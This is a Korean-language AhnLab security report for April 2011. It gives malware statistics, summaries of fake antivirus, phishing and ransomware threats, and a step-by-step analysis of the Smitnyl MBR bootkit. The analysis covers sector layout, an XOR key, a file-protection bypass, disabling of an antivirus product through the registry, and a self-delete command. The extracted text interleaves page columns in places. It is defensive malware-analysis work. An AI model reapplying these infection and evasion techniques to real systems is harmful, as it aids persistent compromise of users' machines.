Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights reserved. ASEC REPORT VOL.16 2011.5 안철수연구소월간보안보고서 악성코드분석특집 - MBR Infector : Smitnyl 분석정보
AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 는악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안철수연구소의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. CONTENTS 01. 악성코드동향 a. 악성코드통계 05 02. 시큐리티동향 a. 시큐리티통계 28 - 악성코드감염보고 Top 20 - 악성코드대표진단명감염보고 Top 20 - 악성코드유형별감염보고비율 - 악성코드유형별감염보고전월비교 - 악성코드월별감염보고건수 - 신종악성코드감염보고 Top 20 - 신종악성코드유형별분포 - 4월마이크로소프트보안업데이트현황 b. 시큐리티이슈 29 - LizaMoon이라명명된대규모 SQL 인젝션공격 - APT 보안위협에의한 RSA 침해사고발생 - 소니플레이스테이션네트워크의 7,700 만명정보유출 b. 악성코드이슈 10 03. 웹보안동향 - 새로운 imm32.dll 패치기법을적용한악성코드 - imm32.dll 패치를위한비정상적함수명사용 - BitDefender 백신으로위장해유포된허위백신 - UPS 운송메일로위장한허위백신설치악성코드 - 메일본문이이미지로처리된허위페이스북안내메일 - 한국어로표기된허위윈도우라이선스랜섬웨어발견 - 스타맵핵으로위장한악성코드 - 익숙한정상프로그램이름으로위장한악성코드유포 - 아이폰, 아이패드에서동작하는상용키로거 a. 웹보안통계 32 - 웹사이트보안요약 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수 - 악성코드배포순위 c. 악성코드분석특집 17 b. 웹보안이슈 35 - MBR Infector : Smitnyl 분석정보 - 2011 년 04 월침해사이트현황
5 6 01. 악성코드동향 a. 악성코드통계 악성코드감염보고 Top 20 악성코드대표진단명감염보고 Top 20 2011 년 4 월악성코드통계현황은다음과같다. 2011 년 4 월의악성코드감염보고는 Textimage/Autorun 이 1 위를차지하고있으며, Win-Trojan/Overtls27.Gen 과 JS/Redirect 가각각 2 위와 3 위를차지하였다. 신규로 Top20 에진입한악성코드는총 8 건이다. 아래표는악성코드의주요동향을파악하기위하여악성코드별변종을종합한악성코드대표진단명감 염보고 Top20 이다. 2011 년 4 월의감염보고건수는 Win-Trojan/Onlinegamehack 이총 1,781,690 건 으로 Top 20 중 16.7% 의비율로 1 위를차지하고있으며, Win-Trojan/Winsoft 가 1,385,102 건으로 2 위, Textimage/Autorun 이 1,148,775 건으로 3 위를차지하였다. 순위등락악성코드명건수비율 순위등락악성코드명건수비율 1 Textimage/Autorun 1,148,610 26.2 % 1 Win-Trojan/Onlinegamehack 1,781,690 16.7 % 2 NEW Win-Trojan/Overtls27.Gen 540,652 12.3 % 2 5 Win-Trojan/Winsoft 1,385,102 13.0 % 3 1 JS/Redirect 471,011 10.7 % 3 1 Textimage/Autorun 1,148,775 10.8 % 4 2 JS/Agent 429,722 9.8 % 4 2 Win-Trojan/Downloader 825,243 7.7 % 5 Win32/Induc 224,589 5.1 % 5 2 Win-Trojan/Agent 770,719 7.2 % 6 NEW Win-Trojan/Winsoft.46080.BR 188,926 4.3 % 6 NEW Win-Trojan/Overtls27 540,652 5.1 % 7 Win32/Palevo1.worm.Gen 156,080 3.6 % 7 6 JS/Redirect 471,011 4.4 % 8 NEW Win-Trojan/Winsoft.78981.CIB 126,814 2.9 % 8 11 Dropper/Malware 470,453 4.4 % 9 3 Win32/Conficker.worm.Gen 121,739 2.8 % 9 1 JS/Agent 429,723 4.0 % 10 3 Win32/Olala.worm 111,065 2.5 % 10 Win32/Conficker 410,871 3.9 % 11 2 Win32/Parite 102,528 2.3 % 11 2 Win32/Autorun.worm 408,925 3.8 % 12 NEW Dropper/Malware.94432.B 94,972 2.2 % 12 Win32/Virut 302,494 2.8 % 13 6 Win32/Virut.f 93,421 2.1 % 13 8 Win-Trojan/Adload 272,959 2.6 % 14 4 VBS/Solow.Gen 87,282 2.0 % 14 0 Win32/Kido 260,927 2.4 % 15 NEW Win32/Flystudio.worm.Gen 86,516 2.0 % 15 9 Win-Adware/Koradware 260,233 2.4 % 16 1 JS/Exploit 85,943 2.0 % 16 Win32/Induc 224,724 2.1 % 17 3 VBS/Autorun 82,326 1.9 % 17 1 Dropper/Onlinegamehack 184,186 1.7 % 18 NEW Win32/Virut 80,306 1.8 % 18 NEW VBS/Solow 183,263 1.7 % 19 NEW Win-Trojan/Winsoft.46080.AR 76,276 1.7 % 19 NEW Win32/Palevo 178,027 1.7 % 20 NEW Win-Trojan/Fosniw.75776 73,389 1.7 % 20 NEW Win32/Palevo1 156,080 1.5 % 4,382,167 100 % 10,666,057 100 % [ 표 1-1] 악성코드감염보고 Top 20 [ 표 1-2] 악성코드대표진단명감염보고 Top 20
7 8 악성코드유형별감염보고비율 악성코드월별감염보고건수 아래차트는고객으로부터감염이보고된악성코드유형별비율이다. 2011 년 4 월의감염보고건수는악 성코드유형별로감염보고건수비율은트로잔 (TROJAN) 류가 50.3% 로가장많은비율을차지하고, 웜 4 월의악성코드월별감염보고건수는 17,531,396 건으로 3 월의악성코드월별감염보고건수 18,626,994 건에비해 1,095,598 건이감소하였다. (WORM) 이 12.3%, 스크립트 (SCRIPT) 가 10.9% 의비율을각각차지하고있다. 20,000,000 18,626,994 +10.3% Trojan 50.3% Worm 12.3% Script 10.9% ETC 9.6% 18,000,000 16,000,000 18,013,021 +10.4% 17,531,396-5.9% Dropper 5.2% Adware 4.9% Virus 4.6% 14,000,000 Downloader 1% Spyware 0.7% Appcare 0.5% 12,000,000 0 2011.02 2011.03 2011.04 [ 그림 1-1] 악성코드유형별감염보고비율 [ 그림 1-3] 악성코드월별감염보고건수 악성코드유형별감염보고전월비교 악성코드유형별감염보고비율을전월과비교하면웜, 스크립트, 드롭퍼 (DROPPER), 바이러스 (VIRUS), 스파이웨어 (SPYWARE) 가전월에비해증가세를보이고있는반면트로잔, 애드웨어 (ADWARE), 다운로더 신종악성코드유형별분포 4 월의신종악성코드유형별분포는트로잔이 79% 로 1 위를차지하였다. 그뒤를이어드롭퍼가 10%, 애 드웨어가 6% 를각각차지하였다. (DOWNLOADER), 애프케어 (APPCARE) 는전월에비해감소한것을볼수있다. 52.8% 50.3% 50% Dropper 10% 25% 6.5% 4.9% Cliker Appcare Adware ETC Dropper Downloader 0.6% 0.5% 0% 0% 1.8% 1% 3.6% 5.2% 8.9% 9.6% 0% 0% 9.9% 10.9% Script Exploit 0.4% 0.7% Trojan Spyware 4.5% 4.6% Virus 11.2% 12.3% Worm Trojan 79% Adware 6% Downloader 1% Spyware 1% Script 1% Worm 1% ETC 1% [ 그림 1-2] 악성코드유형별감염보고전월비교 [ 그림 1-4] 신종악성코드유형별분포
9 10 악성코드감염보고 Top 20 아래표는 4 월에신규로접수된악성코드중고객으로부터감염이보고된악성코드 Top 20 이다. 4 월의 신종악성코드감염보고의 Top 20 은 Win-Trojan/Overtls27.Gen 이 540,652 건으로전체 33.4% 를차지하 01. 악성코드동향 b. 악성코드이슈 여 1 위를차지하였으며, Win-Trojan/Winsoft.46080.BR 이 188,926 건 2 위를차지하였다. 순위악성코드명건수비율 1 Win-Trojan/Overtls27.Gen 540,652 33.4 % 2 Win-Trojan/Winsoft.46080.BR 188,926 11.7 % 3 Win-Trojan/Winsoft.78981.CIB 126,814 7.8 % 4 Dropper/Malware.94432.B 94,972 5.9 % 5 Win-Trojan/Fosniw.75776 73,389 4.5 % 6 Win-Trojan/Bho.213216 69,742 4.3 % 7 Win-Trojan/Winsoft.78085.B 67,985 4.2 % 8 Win-Trojan/Winsoft.75776.D 54,382 3.4 % 9 JS/Ms10-018 44,125 2.7 % 10 Win-Trojan/Winsoft.78089 38,098 2.4 % 11 Win-Spyware/BHO.233984 37,581 2.3 % 12 Win-Trojan/Downloader.75776.X 36,114 2.2 % 13 Dropper/Malware.235520.CF 34,064 2.1 % 14 Win-Adware/ColorSoft.490530 33,413 2.1 % 15 Win-Trojan/Winsoft.78125 33,004 2.0 % 16 Win-Trojan/Winsoft.78109 32,339 2.0 % 17 Win-Trojan/Onlinegamehack.115200.Y 30,069 1.9 % 18 Win-Adware/KorAdware.98304.F 30,014 1.9 % 19 Win-Trojan/Onlinegamehack.122880.AM 27,887 1.7 % 20 HTLM/Downloader 26,723 1.6 % 1,620,293 100 % [ 표 1-3] 신종악성코드감염보고 Top 20 새로운 imm32.dll 패치기법을적용한악성코드 3월 2일 ASEC에서는온라인게임의사용자정보를유출하는악성코드중보안제품인 V3의설치여부에따라다른감염기법들을가지고있는악성코드의사례에대해이야기한바있다. 지속적으로발견되고있는정상시스템파일인 imm32.dll에대한패치를수행하는악성코드들의패치기법이최근변경된것을 ASEC에서확인하였다. 2 월말과 3월초에발견된 imm32.dll의패치를수행하는악성코드는 [ 그림 1-5] 와같이 imm32.dll 파일의익스포트 (Export) 함수모두를포워드하지않고있었다. [ 그림 1-5] 익스포트함수포워딩기법을사용한악성코드그러나최근에발견되고있는악성코드들에서는 [ 그림 1-6] 과같이 imm32.dll 파일의익스포트 (Export) 함수들을포워드하지않고있다. [ 그림 1-6] 익스포트함수포워딩을사용하지않은악성코드 [ 그림 1-7] 코드형태로감염시키도록설계된악성코드직접적으로포워드하는방식대신해당악성코드내부에서별도의코드로함수를호출하는방식을사용한다는특징이있다. [ 그림 1-8] SUB 루틴으로 imm32a.dll를로드하는악성코드 실제해당 imm32.dll 파일에대한패치를수행하는악성코드를분석해보면 imm32.dll 파일이익스포트하는함수모든함수에대하여 [ 그림 1-7] 과같이 PUSH 이후 CALL을수행하도록되어있다. [ 그림 1-7] 의 CALL을수행하는코드부분을따라가면 SUB 루틴으로 imm32a.dll를로드하도록구성되어있다. 위설명과같이이번에발견된 imm32.dll 파일을패치하는악성코드는익스포트함수들을
11 12 - Win-Trojan/PatchedImm.Gen 이외에추가적으로감염된 PC 에설치되어있는웹브라우저실행 [ 표 1-4]UPS 운송메일로위장한악성코드의메일 1 형 imm32.dll 파일에대한새로운패치기법을적용한악성코드들은 V3 제품군에서다음과같이진단한다. BitDefender 백신으로위장해유포된허위백신 1월 31일 ASEC에서는해외에서무료백신으로널리알려진보안업체인 AVG에서배포하는정상 AVG Anti-Virus 2011 소프트웨어로위장한허위백신이발견되었다는소식을전한바있다. 최근루마니아의보안업체인소프트윈 (SoftWin) 에서개발한보안제품인비트디펜더 (BitDefender) 로위장한허위백신이발견되었다. 이번에발견된소프트윈의비트디펜더로위장한허위백신은 [ 그림 1-10] 과같이비트디펜더보안제품과유사한사용자인터페이스를가지고있으며, 메뉴에도비트디펜더의로고를그대로사용하고있다. [ 그림 1-10] 허위진단결과를보여주는허위비트디펜더제품 시 [ 그림 1-12] 와같이사용하는 PC에악성코드가감염되어접속이거부되었다는허위메시지를보여준다. [ 그림 1-12] 허위비트디펜더에서차단한웹브라우저연결이번에발견된비트디펜더보안제품으로위장한허위백신은 V3 제 메일제목 United Parcel Service notification <5자리숫자 > Dear customer. The parcel was sent your home address. And it will arrive within 3 business day. More information and the tracking number are 메일본문 attached in document below.v Thank you.? 1994-2011 United Parcel Service of America, Inc. - UPS.zip - UPS-tracking.zip 첨부파일 ( 다음중하나 ) 첨부된 UPS.zip 파일의압축을풀면 UPS.exe(18,944 바이트 ) 가생성되며 UPS-tracking.zip 파일의압축을풀면 UPS-tracking.exe(18,432 바이트 ) 가생성된다. - Win-Trojan/PatchedImm.Gen - Win-Trojan/PatchedImm2.Gen 품군에서다음과같이진단한다. - Win-Trojan/Fakeav.1243656 [ 표 1-5]UPS 운송메일로위장한악성코드의메일 2 형 imm32.dll 패치를위한비정상적함수명사용 최근보안제품의진단을회피하기위해 imm32.dll 패치를수행하는악성코드중 [ 그림 1-9] 와같이 imm32.dll에서사용하는익스포트함수들중일부를비정상적인명칭으로변경한사례가발견되었다. 보안제품의탐지를우회하기위한악성코드의변화는지속될것으로예상되며최근에는윈도우시스템파일들중하나인 ksuser.dll, midimap.dll 와 comres.dll 를패치하는악성코드들도발견되고있다. 그러므로사용하는운영체제와웹브라우저그리고어도비 (Adobe) 제품들의최신보안패치적용하여사전에피해를예방하는것이중요하다. 비정상적인명칭으로 imm32.dll를패치하는해당악성코드들은 V3 제품군에서다음과같이진단한다. 허위비트디펜더보안제품은기존에발견된다른허위백신들과유사하게 PC에감염이되면자동으로시스템전체를검사하며 [ 그림 1-11] 과같이다수의정상파일들을악성코드에감염되었거나감염된파일이라는허위경고문구를보여주어사용하는 PC에심각한문제가발생한것으로오인하게만든다. - Win-Trojan/Fakeav.1242632 이번보안업체의정상적인백신으로위장한허위백신이발견된만큼향후에도이와유사한형태의정상적인보안업체에서개발한소프트웨어로위장한허위백신들이지속적으로발견될것으로예측된다. 그러므로자주사용하는소프트웨어는항상정품을구매해서사용하도록하고, 인터넷을통해무료소프트웨어를다운로드할경우에는해당소프트웨어를개발한해당업체웹사이트에서직접다운로드하여설치하는것이중요하다. 그리고인터넷을통해내려받은파일들은반드시최신엔진으로업데이트된백신으로실행전에검사를수행하는것이중요하다. UPS 운송메일로위장한허위백신설치악성코드 메일제목메일본문첨부파일 ( 다음중하나 ) - UPS Package - UPS: Your Package - Your Tracking Number - United Postal Service Tracking Nr.<10자리숫자 > Good day, We were not able to deliver parcel you sent on the 19nd March in time because the recipient s address is not correct. Please print out the invoice copy attached and collect the package at our office. - UPS_TRACKING_NR_<10자리숫자 >.zip 첨부된 UPS_TRACKING_NR_<10자리숫자 >.zip의압축을풀게되면 UPS_TRACKING_NR_<10자리숫자 >.DOC.exe (546,304 바이트 ) 이생성된다. 3 월 24 일부터국내로유입되기시작한 UPS(United Parcel Service) 운송메일로위장된악성코드변종이현재까지도유포되고있다. 이 [ 그림 1-9] 비정상적인함수명으로변경한악성코드 [ 그림 1-11] 허위경고문구를보여주는허위비트디펜더제품 번에유포된 UPS 운송메일로위장한악성코드는다음과같은크 게 2 가지형태를가지고있다. 압축해제된파일들이실행되면감염 [ 그림 1-13] 메모리영역에삽입된악성코드 된시스템에존재하는정상 svchost.exe 파일을강제로실행시킨후 [ 그림 1-12] 와같이해당정상파일의특정메모리영역에자신의코 드전체를삽입한후실행된다. 메모리영역에삽입된코드는정상시스템파일을이용하여우크 라이나에위치한특정시스템에서특정파일들을내려받은후실 행되며내려받은파일은 [ 그림 1-14] 와같이정상적인윈도보안 센터에강제적으로 보안설정관리대상 에 XP Home Security 를생성한다.
13 14 [ 그림 1-14] 윈도보안센터에등록된허위백신 XP Home Security 진단한파일들의치료를위해등록 (Register) 를클릭하게되면 [ 그림 이번에발견된메일본문전체가이미지로처리된허위페이스북메 한국어로표기된허위윈도우라이선스랜섬웨어발견 1-17] 과같이금전적인결제를하여야만정상적인사용이가능하다고안내하고있다. [ 그림 1-17] 허위진단결과를이용해치료를위한구매결제를요구 일은 [ 그림 1-18] 과동일한메일본문을가지고있으며메일제목은 Spam from your Facebook account 또는 Spam from your account 를사용하고있다. [ 그림 1-18] 메일본문전체가이미지로처리된허위페이스북발송메일 3월 22일윈도운영체제의 라이선스경고 메시지로위장한랜섬웨어 (Ransomware) 가발견되었다. 이번에발견된랜섬웨어는사용중인윈도우운영체제의라이선스가복사본이며새롭게인증을받으라며특정전화로연결하도록유도하고있다. 해당랜섬웨어의감염 및동작형태로미루어 3 월 13 일발견된한국어로표기된사이버범 죄경고랜섬웨어의다른변형으로추정된다. 해당랜섬웨어가실행 이되면감염된시스템의언어코드를획득하여 [ 그림 1-19] 와같이 한국어윈도일경우에는한국어로 윈도라이선스가사본이며정상 라이선스구매를한것이아니므로차단하였다. 인증이활성화될때 까지컴퓨터를정상적으로사용하지못한다 는허위안내문구를보 여준다. 또한해당프로그램은다른프로그램들의실행을방해하여 정상적인시스템사용을어렵게만든다. 그리고 [ 그림 1-15] 와같이시스템전체를검사한후정상파일들을 추가적으로다음의메일형식을가지고있는것들도발견되고있다. 악성코드로진단하는허위진단결과를보여주게된다. 이번에발견된허위백신은지금까지발견된다른허위백신들과는 [ 표 1-6] 메일본문전체가이미지로처리된허위페이스북발송메일구성 [ 그림 1-19] 허위윈도라이센스경고를보여주는랜섬웨어 [ 그림 1-15] 악성코드로허위진단된정상파일들 달리정상적인윈도우보안센터의 보안설정관리대상 에허위백신을실행하도록연결시켜시스템사용자로하여금정상적인보안프로그램으로오인하도록설정한부분이특이점이라고할수있다. 메일제목 Your password is changed Dear Customer 해당허위백신들은 V3 제품군에서다음과같이진단한다. Spam is sent from your FaceBook account. - Win-Trojan/Chepvil.18432 Your password has been changed for safety. - Win-Trojan/Chepvil.18944.B - Win-Trojan/Fakeav.143872.H - Win-Trojan/Fakeav.143872.I 메일본문 Information regarding your account and a new password is attached to the letter. Read this information thoroughly and change the password to complicated one. 검사가종료된이후에는이제까지발견된다른허위백신들사례에서와같이 [ 그림 1-16] 의 시스템에서심각한악성코드가발견되었으며치료를위해서등록을하라 는허위문구를보여준다. [ 그림 1-16] 허위백신이보여주는허위경고문구 - Win-Trojan/Fakeav.64008 - Win-Trojan/Fakealert.546304 - Win-Trojan/Agent.33928.B - Win-Trojan/Agent.33928.C 메일본문이이미지로처리된허위페이스북안내메일 2011년 1월부터 4월현재까지소셜네트워크서비스 (Social Network Service) 인페이스북 (Facebook) 에서발송하는메일로위장한악성코드가지속적으로발견되고있다. 최근에발견되고있는페이스북에서발송하는것으로위장한메일중기존과다르게메일본문전체를이미지로처리하여보안제품에서탐지되기어렵도록한사례가발견되었다. 이러한사례는다음과같이과거에도다수발견된사례가있다. Please do not reply to this email, it's automatic mail notification! Thank you for your attention. Your Facebook! - FacebookP[6자리숫자 ].zip (23,586 바이트 ) 압축파일을풀게되면 FacebookPassword.exe 첨부파일 (26,624 바이트 ) 가생성된다. 해당파일은외부에존 ( 다음중하나 ) 재하는시스템에서다른악성코드들을다운로드하고해외에서제작된허위백신들의감염을목적으로하고있다. 이번에발견된페이스북에서발송하는메일로위장하여유포되었던악성코드들은 V3 제품군에서다음과같이진단한다. 그러나다양한변형들이존재하므로사용자의각별한주의가필요하다. [ 그림 1-20] 전화로라이선스활성화를요구하는랜섬웨어 - 2010년 6월메일본문을이미지로처리한악성스팸메일 - 2010년 8월메일본문을이미지처리한페덱스위장악성코드 - 2010년 10월메일본문이이미지로제작된허위 USPS 운송메일 - 2010년 10월메일본문을이미지로처리한허위 DHL과 UPS 운송메일 - Win-Trojan/Bredo.27136 - Win-Trojan/Agent.30808 - Win-Trojan/Bredolab.26624.AY - Win-Trojan/Oficla.108032
15 16 해당문구의안내에따라 ' 다음 ' 을누르게되면 [ 그림 1-20] 과같이특정전화번호로전화를하여라이선스를활성화하라고권유한다. 그러나해당전화번호들로전화를걸어본결과없는번호로확인되었다. 이번에발견된허위윈도라이선스랜섬웨어는취약한웹사이트등을통해유포되고있는것으로추정되므로신뢰할수없는웹사이트접속을주의하고취약점이존재하는웹브라우저는최신버전으로업데이트하여사전에이러한형태의랜섬웨어감염을예방하는것이중요하다. 해당랜섬웨어는 V3 제품군에서다음과같이진단한다. - Win-Trojan/Fakeav.320000.AT - Win-Trojan/Serubsit.145920 [ 그림 1-22] 에서보는것처럼드롭퍼기능을가진 aaa.exe 가실행되면시스템폴더에악성 DLL을생성하며, 해당 DLL은 svchost.exe 에주입 (Injection) 되어실행되며주기적으로 [ 그림 1-24] 의사이트로접속을시도한다. [ 그림 1-23] DLL의접속시도행위해당악성코드를테스트할당시에는접속행위는있었으나추가증상 ( 파일내려받기등 ) 은발생하지않았으며접속을시도하는 URL에대해서검색해보면홍콩에위치해있는특이점이있었다. [ 그림 1-24] 접속 URL의네트워크정보 아이폰, 아이패드에서동작하는상용키로거해외에서아이폰 (iphone) 과아이패드 (ipad) 에서동작하는키입력을가로채는키로거 (Keylogger) 가상용으로제작되어판매되는것이발견되었다. 이번에발견된상용키로거는애플사의 ios에동작하도록되어있으나모든아이폰과아이패드에서동작하는형태는아니다. 해당상용키로거는아이폰과아이패드를순정상태가아닌사용자에의해탈옥 (JailBreak) 된상태에서만설치되어키입력을가로채도록되어있으며가로챈키입력들을지정한특정메일주소로모두를전송하도록설정할수있다. [ 그림 1-26] 아이폰과아이패드에서동작하는상용키로거판매웹사이트 스타맵핵으로위장한악성코드게임핵으로위장한악성코드유포는하루이틀의이야기가아니다. 최근에는스타맵핵으로위장한악성코드의유포가기승을부리고있다. 전세계적으로가장인기있는게임중하나인스타크래프트를대상으로상대방을쉽게이기기위해상대방의진영을훤히들어다볼수있는스타맵핵프로그램이있으며, 이프로그램은인터넷검색을통해서어렵지않게구할수가있다. [ 그림 1-21] 스타맵핵으로올려진파일들 순간의쉬운승리를위해핵프로그램을사용하는것은사용자자신의 PC를악성코드감염위험에빠트리는행동이다. 이러한툴의사용은신중한판단이절실히필요하다. 익숙한정상프로그램이름으로위장한악성코드유포최근사용자에게익숙한제품이나유명인사, 회사, 사회적이슈등을악성코드유포에사용함으로써사용자가별의심없이실행하도록유도하고있다. [ 그림 1-25] 는 V3 Lite 제품의파일인것처럼속이기위한 v3lite.exe라는파일명을가진악성코드이다. [ 그림 1-25] v3 lite의제품의파일인것처럼위장한악성코드 이번에발견된상용키로거외에도순정상태가아닌, 사용자에의해탈옥 (JailBreak) 된아이폰과아이패드에서동작하는악성코드역시 2009년 11월발견된사례가있다. 이러한탈옥 (JailBreak) 상태에서동작하는악성코드가있었던만큼아이폰및아이패드를인위적으로조작및변경하게될경우예상치못한보안위협들에노출될수있으므로사용자의주의가필요하다. 블로그나까페를통해유포되는이런프로그램들중일부는설치과정에서스타맵핵프로그램만설치되는것이아니라악성코드 (aaa. exe) 도함께설치된다. [ 그림 1-22] 스타맵핵이설치되는경로 PC를사용함에있어자신이실행하는파일에대해서의심이될경우백신업체로신고를하고설치된백신및윈도우보안업데이트를항상최신으로유지하도록해야할것이다.
17 18 01. 악성코드동향 C. 악성코드분석특집 MBR Infector : Smitnyl 분석정보 MBR (Master Boot Record) 에는운영체계가어디에, 어떻게자리잡고있는지를식별하여컴퓨터의주기 [ 그림 1-29] 메인드롭퍼의파일포멧 억장치에적재될수있도록하기위한정보들이있으며하드디스크의첫번째섹터에저장되어있다. 이런 MBR을감염시키는경우는 PE (Portable Executable) 파일을감염시키는경우보다흔하게발견되지않는다. 그만큼복잡하고크기또한제한적이며조그만에러나버그에도시스템이부팅불가능한상태가될수있기때문이다. 최근에는이렇게 MBR을감염시키는 Smitnyl Bootkit 류가나타났으며무료파일공유네트워크를통해확산된것으로추정된다. 1. 시스템의감염및증상 Smitnyl Bootkit 은 MBR 과섹터들에감염데이터들을저장한다. 그리고재부팅시에정상 userinit.exe 또 한감염시켜서최종적으로는특정사이트에서파일을내려받아실행하는동작을수행한다. [ 그림 1-27] 과 [ 그림 1-28] 을보면감염전후에변화된 MBR 의상태를확인할수있다. [ 그림 1-27] 감염전원본 MBR [ 그림 1-28] 감염후 MBR [ 그림 1-29] 에서볼수있듯이메인드롭퍼는원하는동작을위한데이터들을리소스영역에저장해둔 것을알수있다. 이렇게저장해둔리소스영역의데이터들을로드하면서감염동작을수행해나가는데 그동작들을차례대로살펴보면아래와같다. 1. 원본 MBR을 5번섹터에저장 2. 리소스영역 (Name= 71 ) 에서 userinit.exe infector payload를로드해서 39번섹터에저장 3. 리소스영역 (Name= 72 ) 에서인코딩된데이터를로드해서 45번섹터에저장 4. 리소스영역 (Name= 6E ) 에서인코딩된데이터를로드해서 46번섹터에저장 45, 46번섹터에저장된데이터들을 0x7F을값으로 XOR 연산을하면 Downloader 기능을하는하나의실행파일이생성됨 5. 리소스영역 (Name= 70 ) 에서 0x200(512byte) 만큼의데이터를읽어서 MBR에덮어씀 6. 리소스영역 (Name= 70 ) 에서 0x200(512byte) 이후의데이터 (MBR 파일시스템 Infector Routine) 를읽어서 32번섹터에저장 대부분의감염동작을하는메인드롭퍼 (Dropper/Smitnyl.37076) 의파일구조를 [ 그림 1-29] 을통해한 눈에볼수있다. MBR 과각섹터, 그리고정상 userinit.exe 을감염시키기위한 payload 들을리소스영역 에각각저장하고있으며다운로더또한인코딩되어 2 개의리소스영역으로나누어져서저장되어있다. 이렇게각섹터에저장된데이터들은내려받기등의기능을위한파일을생성할때나부팅시에정상 userinit.exe 를감염시킬때사용이되는데이렇게 MBR 감염을통해윈도시스템파일인 userinit.exe 를 감염시키는이유는백신제품들이시스템의감염여부를쉽게알수없게하고윈도의 WFP (Windows File Protection) 를우회하기위한것으로볼수있다.
19 20 2. 각모듈별주요특징과기능 2.1 메인드롭퍼 (Dropper/Smitnyl.37076) B. 정상 MBR 백업 MBR 을감염시키기위해가장먼저정상 MBR 을 5 번섹터에백업해놓는데그방법은먼저 CreateFileA API Dropper/Smitnyl.37076 으로진단되는메인드롭퍼의주요동작은 [ 그림 1-30] 와같다. 먼저중국산하드 디스크모니터링도구인 HDDGMON.exe 와 DF5Serv.exe 프로세스를확인해서실행중이면리소스에서 에 Filename 파라미터로 \\.\PHYSICALDRIVE0 를줘서 512byte 인 MBR 을읽어서스택에저장해놓는다. [ 그림 1-32] 512byte 의정상 MBR 을스택에저장 Name=6F 로검색 / 로드한후 pcidump.sys 또는 beep.sys 또는 DeviceCutter.sys 파일명으로저장한다. 그리고각파일명의서비스를시작한다. [ 그림 1-30] 메인드롭퍼의주요동작 SetFilePointer API 를이용해서파일포인터를 5 번섹터로이동하고 (0xA00 = 2560, 2560/512 = 5( 번섹 터 )) 스택에저장해놓았던 512byte 의원본 MBR 을덮어쓴다. [ 그림 1-33] 512byte 의정상 MBR 을 5 번섹터에백업 이후의대부분동작은리소스에있는데이터들을 MBR, userinit.exe 감염및특정섹터들에저장시키기 위해로드하고메인드롭퍼, 즉자신을삭제하고동작을끝낸다. A. 윈도파일보호우회 SFC.dll 파일은 System File Checker 기능을하는윈도시스템파일로 %SYSTEM% 폴더에저장되어있 다. 메인드롭퍼는 %SYSTEM% 폴더에자신이원하는파일을생성하기위해 SFC.dll 파일의 5 번째함수 인 sfcfileexception 함수를이용해서윈도파일보호를우회한다. [ 그림 1-31] SFC.dll _ sfcfileexception 함수를이용한파일보호우회 C. 리소스영역의데이터로드 앞서설명했듯이메인드롭퍼의주요동작은리소스영역에서데이터들을로드하고각섹터에저장및 파일로생성하는것이다. 데이터를로드하는방법은대부분비슷하므로대표로 0x71 이름의리소스를 39번섹터에저장시키는방법을알아보도록하겠다. 먼저 FileResourceA API를이용해파일내의리소스영역에서 Type = RES, Name = 71 조건에해당하는데이터 (Size=0xA00, Address=0x00407050) 를찾아서로드한다. 그리고 SetFilePointer API를이용해서파일포인터를 39번섹터로이동하고 (0x4E00 = 19968, 19968/512 = 39( 번섹터 )) 에로드해놓은 0x00407050에있는 0xA00 만큼의데이터를저장한다. 이때, WriteFile API를사용하여 512byte(0x200) 씩쓰기때문에 0xA00을다쓰기위해 5번반복한다.
21 22 [ 그림 1-34] Type = RES, Name = 71 리소스데이터를 39 번섹터에저장 E. 메인드롭퍼자기삭제 cmd /c del %Main Dropper 폴더 %\MainDropper.exe > nul 명령어를실행시켜서자신을삭제한다. [ 그림 1-36] 자기삭제루틴 2.2 감염된 userinit.exe (Win-Trojan/Agent.25600.YE) 메인드롭퍼의리소스영역에 71 이름으로저장된데이터는 39번섹터에쓰이고재부팅시정상 userinit. exe에또다시덮어쓰인다. 주요동작은아래그림과같이 45번섹터에저장되어있는인코딩된데이터를디코딩해서실행시킨다. 그외에는 360Safe가존재하면 360safe IE Protection을종료시키고임시폴더 (%Temp%) 에가짜 explorer.exe를생성해서디코딩한 45번섹터의내용을쓴다. 그리고정상 explorer. D. 정상 MBR 감염 FileResourceA API 를이용해파일내의리소스영역에서 Type = RES, Name = 70 인조건에해당하는데 이터 (Size=0xF2A, Address=0x00406120) 를찾아서로드하고처음 512byte 를정상 MBR 영역에덮어쓴다. exe 를실행시켜서 explorer.exe 의실행이정상적으로된것처럼사용자를속인다. [ 그림 1-37] 39 번에저장되어있는 userinit.exe 감염코드의동작 [ 그림 1-35] 정상 MBR 영역에데이터를덮어쓰는과정 A. 360Safe IE Protection 종료 RegOpenKeyExA API를사용하여 HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon 레지스트리를확인해서존재하면 IEProtAccess, IEProtNotify 값을 0 으로설정하여 360Safe IE Protection을종료한다. 참고로 360Safe IE Protection은중국산백신관련제품이다.
23 24 [ 그림 1-38] 360Safe IE Protection 종료 [ 그림 1-39] 디코딩루틴과파일변화 B. 가짜 explorer.exe 실행및실행 가짜 explorer.exe를저장하기위해임시폴더경로를얻어온후에 45번섹터로접근해서인코딩데이터를디코딩한후임시폴더경로에 explorer.exe 파일로생성및실행하며 explorer.exe가정상적으로실행된것으로보이기위해실제정상 explorer.exe도실행시킨다. 이중디코딩과정은 45번섹터에서 512byte를읽어서스택에저장한후 7F 로 XOR 연산을한다. 그리고 MZ, PE 시그니쳐는 4D5A, 5045 으로직접보정한후가짜 explorer.exe에쓴다. 이과정을 9번하도록조건이설정되어있다. 2.3 가짜 explorer.exe (Win-Trojan/Pincav.4608.AT) 메인드롭퍼의리소스영역에 72 이름과 6E 이름으로저장된인코딩된데이터는 45 번과 46 번섹터에쓰 인다. 이인코딩된데이터는앞의 39 번섹터에저장된루틴에의해디코딩후가짜 explorer.exe 로생성되 어실행되고 [ 그림 1-40] 와같이 IEXPLORE.EXE 에인젝션되어내려받기기능을수행한다. [ 그림 1-39] 디코딩루틴과파일변화 [ 그림 1-40] 가짜 explorer.exe 의동작
